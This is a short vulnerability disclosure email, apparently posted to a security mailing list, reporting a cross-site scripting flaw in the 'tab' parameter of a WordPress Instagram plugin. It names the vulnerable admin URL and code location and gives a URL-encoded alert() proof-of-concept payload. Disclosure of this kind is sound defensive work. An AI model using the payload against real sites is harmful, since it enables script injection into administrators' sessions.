Subject: Cross-Site Scripting (XSS) in Alpine PhotoTile for Instagram 1.2.7.5
Date: Thu, 20 Aug 2015 11:55:29 +0200

Hello,

Plugin: Alpine PhotoTile for Instagram 1.2.7.5 https://wordpress.org/plugins/alpine-photo-tile-for-instagram/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=[xss]
Url: GET
Vulnerable parameters: tab

Example PHP callstack:
PhotoTileForInstagramAdmin::admin_build_settings_page   [/alpine-photo-tile-for-instagram/gears/alpinebot-admin.php:793]

Verification:
http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,